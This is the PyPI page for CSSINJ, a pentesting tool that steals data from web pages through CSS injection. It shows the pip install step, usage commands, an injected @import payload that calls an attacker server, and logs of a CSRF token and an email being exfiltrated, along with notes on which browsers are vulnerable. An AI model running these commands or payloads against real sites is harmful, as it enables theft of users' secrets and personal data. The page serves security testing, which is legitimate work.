A python tools to exploits CSS injection vulnerabilities to exfiltrate sensitive information from web applications.

Navigation

Verified details

These details have been verified by PyPI
Project links
GitHub Statistics
Maintainers
Avatar for DonAsako from gravatar.com DonAsako

Unverified details

These details have not been verified by PyPI
Meta
  • License: GNU General Public License v3 (GPLv3) (GNU GENERAL PUBLIC LICENSE)
  • Author: DonAsako
  • Tags CSS , BugBounty , Web , cssinj
  • Requires: Python >=3.10
Classifiers
Report project as malware

Project description

CSSINJ

  _____   _____   _____  _____  _   _       _     _____  __     __
 / ____| / ____| / ____||_   _|| \ | |     | |   |  __ \ \ \   / /
| |     | (___  | (___    | |  |  \| |     | |   | |__) | \ \_/ /
| |      \___ \  \___ \   | |  | . ` | _   | |   |  ___/   \   /
| |____  ____) | ____) | _| |_ | |\  || |__| | _ | |        | |
 \_____||_____/ |_____/ |_____||_| \_| \____/ (_)|_|        |_|

About

CSSINJ is a penetration testing tool that exploits CSS injection vulnerabilities to exfiltrate sensitive information from web applications. This tool is designed for security professionals to assess the security posture of web applications by demonstrating how CSS can be used to extract data covertly.

Installation

To install CSSINJ, run the following command:

pip install cssinj

Now you’re ready to use CSSINJ!

Usage

python3 -m cssinj [-h] -H HOSTNAME -p PORT [-e ELEMENT] [-a ATTRIBUT] [-d] [-m {recusive,font-face}] [-o OUTPUT]

Options

Option Description
-h, --help Show help message and exit
-H, --hostname Attacker hostname or IP address
-p, --port Port number of the attacker
-e, --element HTML element to extract specific data
-a, --attribut Specify an element Attribute Selector for exfiltration
-d, --details Show detailed logs of the exfiltration process, including extracted data
-m, --method Specify the type of exfiltration (recursive or font-face)
-t, --timeout Timeout in seconds before considering exfiltration complete (default: 3.0)
-o, --output File to store the exfiltrated data in JSON format

Example

Victim's View :

<h1>Welcome on my page !</h1>
<input type="text" id="username" value="admin" disabled>
<input type="email" id="email" value="admin@admin.XX" disabled>
<input type="text" class="csrf" value="MySecretAdminToken" hidden>
<img src="XXXXXXXXXXX.XX">
...
<style>
  @import url('//localhost:5005/start');
</style>
...

Recursive attack

Using a specific HTML identifier :
~ python3 -m cssinj inject -H 127.0.0.1 -p 5005 -e input
  _____   _____   _____  _____  _   _       _     _____  __     __
 / ____| / ____| / ____||_   _|| \ | |     | |   |  __ \ \ \   / /
| |     | (___  | (___    | |  |  \| |     | |   | |__) | \ \_/ /
| |      \___ \  \___ \   | |  | . ` | _   | |   |  ___/   \   /
| |____  ____) | ____) | _| |_ | |\  || |__| | _ | |        | |
 \_____||_____/ |_____/ |_____||_| \_| \____/ (_)|_|        |_|

[2025-03-11 03:06:49] 🛠️ Attacker's server started on 127.0.0.1:5005
[2025-03-11 03:06:49] 🌐 Connection from ::1
[2025-03-11 03:06:49] ⚙️ ID : 1
[2025-03-11 03:06:49]  [1] - The value exfiltrated from input is : MySecretAdminToken
[2025-03-11 03:06:49]  [1] - The value exfiltrated from input is : admin@admin.XX
[2025-03-11 03:06:49]  [1] - The value exfiltrated from input is : admin
Using a specific CSS attribute selector and a generic HTML identifier:
~ python3 -m cssinj -H 127.0.0.1 -p 5005 -e * -a src
  _____   _____   _____  _____  _   _       _     _____  __     __
 / ____| / ____| / ____||_   _|| \ | |     | |   |  __ \ \ \   / /
| |     | (___  | (___    | |  |  \| |     | |   | |__) | \ \_/ /
| |      \___ \  \___ \   | |  | . ` | _   | |   |  ___/   \   /
| |____  ____) | ____) | _| |_ | |\  || |__| | _ | |        | |
 \_____||_____/ |_____/ |_____||_| \_| \____/ (_)|_|        |_|

[2025-03-11 03:06:49] 🛠️ Attacker's server started on 127.0.0.1:5005
[2025-03-11 03:06:49] 🌐 Connection from ::1
[2025-03-11 03:06:49] ⚙️ ID : 1
[2025-03-11 03:06:49]  [1] - The src exfiltrated from * is : XXXXXXXXXXX.XX

Font-face attack

~ python3 -m cssinj -H 127.0.0.1 -p 5005 -e h1 --method font-face
  _____   _____   _____  _____  _   _       _     _____  __     __
 / ____| / ____| / ____||_   _|| \ | |     | |   |  __ \ \ \   / /
| |     | (___  | (___    | |  |  \| |     | |   | |__) | \ \_/ /
| |      \___ \  \___ \   | |  | . ` | _   | |   |  ___/   \   /
| |____  ____) | ____) | _| |_ | |\  || |__| | _ | |        | |
 \_____||_____/ |_____/ |_____||_| \_| \____/ (_)|_|        |_|

[2025-05-21 03:06:49] 🛠️ Attacker's server started on 127.0.0.1:5005
[2025-05-21 03:06:49] 🌐 Connection from 127.0.0.1
[2025-05-21 03:06:49] ⚙️ ID : 1
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 :  
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : e
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : W
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : l
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : c
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : o
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : m
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : n
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : y
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : p
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : a
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : g
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : !

Browser-Specific Behavior

The success of CSS injection attacks using @import depends on the browser's handling of CSS imports:

  • Chromium-based browsers (Chrome, Edge, Brave, etc.) allow recursive CSS imports and will process the injected styles, making them vulnerable to exfiltration techniques using @import.

  • Firefox, however, handles @import differently:

    • Unlike Chromium-based browsers, Firefox processes all @import rules before applying any styles.
    • As a result, the attack fails because the browser never processes the CSS selectors, preventing data exfiltration.
    • This behavior causes an infinite loop where the browser keeps waiting for a CSS update that never happens.

This difference in behavior makes Chromium-based browsers more susceptible to CSS injection exfiltration, while Firefox provides better protection against such attacks.

Todo

  • General :

    • Add error Handler
      • File error Handler
    • Add test
    • Edit Terminal

  • Injection :

    • Add timeout for font-face exfiltration

  • Complete Exfiltration (Blind):

    • 0. Complete dom objects
    • 1. Get Structure of the HTML (Tags)
    • 2. Get all Attributs for each Element
    • 3. Get all value for each Attributs
    • 4. Get text using font-face exfiltration

Disclaimer

This tool is intended only for ethical hacking and security research. Unauthorized use on systems without explicit permission is illegal. The developer is not responsible for any misuse of this tool.

Author

CSSINJ was developed by DonAsako.

Project details

Verified details

These details have been verified by PyPI
Project links
GitHub Statistics
Maintainers
Avatar for DonAsako from gravatar.com DonAsako

Unverified details

These details have not been verified by PyPI
Meta
  • License: GNU General Public License v3 (GPLv3) (GNU GENERAL PUBLIC LICENSE)
  • Author: DonAsako
  • Tags CSS , BugBounty , Web , cssinj
  • Requires: Python >=3.10
Classifiers

Release history Release notifications | RSS feed

This version

0.2.0

0.1.0

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

cssinj-0.2.0.tar.gz (50.5 kB view details)

Uploaded Source

Built Distribution

If you're not sure about the file name format, learn more about wheel file names.

cssinj-0.2.0-py3-none-any.whl (39.6 kB view details)

Uploaded Python 3

File details

Details for the file cssinj-0.2.0.tar.gz.

File metadata

  • Download URL: cssinj-0.2.0.tar.gz
  • Upload date:
  • Size: 50.5 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? Yes
  • Uploaded via: twine/6.1.0 CPython/3.13.7

File hashes

Hashes for cssinj-0.2.0.tar.gz
Algorithm Hash digest
SHA256 95ce3e40eaa282388ef83bcc040a1a59237896b145c88adcdb95482710a6de6a
MD5 6dd49e17d763da0b1533de143a976f1f
BLAKE2b-256 68490a3d5c7b6c7a0625b0dbf7f145eb7b63017e55b0bb6e927b775acec96aae

See more details on using hashes here.

Provenance

The following attestation bundles were made for cssinj-0.2.0.tar.gz:

Publisher: publish-to-pypi.yml on DonAsako/CSSinj

Attestations: Values shown here reflect the state when the release was signed and may no longer be current.

File details

Details for the file cssinj-0.2.0-py3-none-any.whl.

File metadata

  • Download URL: cssinj-0.2.0-py3-none-any.whl
  • Upload date:
  • Size: 39.6 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? Yes
  • Uploaded via: twine/6.1.0 CPython/3.13.7

File hashes

Hashes for cssinj-0.2.0-py3-none-any.whl
Algorithm Hash digest
SHA256 f99015cf47fa21173b8ff79ffdcd1aeb356e3dad18b4e77b7a839d5014c2d149
MD5 bcb46e611b91a49607263507ae9565e8
BLAKE2b-256 5c16a74c948ac00e99168f2e09bf1cfa85ac477544b44043d0d91481bd3d8d53

See more details on using hashes here.

Provenance

The following attestation bundles were made for cssinj-0.2.0-py3-none-any.whl:

Publisher: publish-to-pypi.yml on DonAsako/CSSinj

Attestations: Values shown here reflect the state when the release was signed and may no longer be current.

Supported by

AWS Cloud computing and Security Sponsor Datadog Monitoring Depot Continuous Integration Fastly CDN Google Download Analytics Pingdom Monitoring Sentry Error logging StatusPage Status page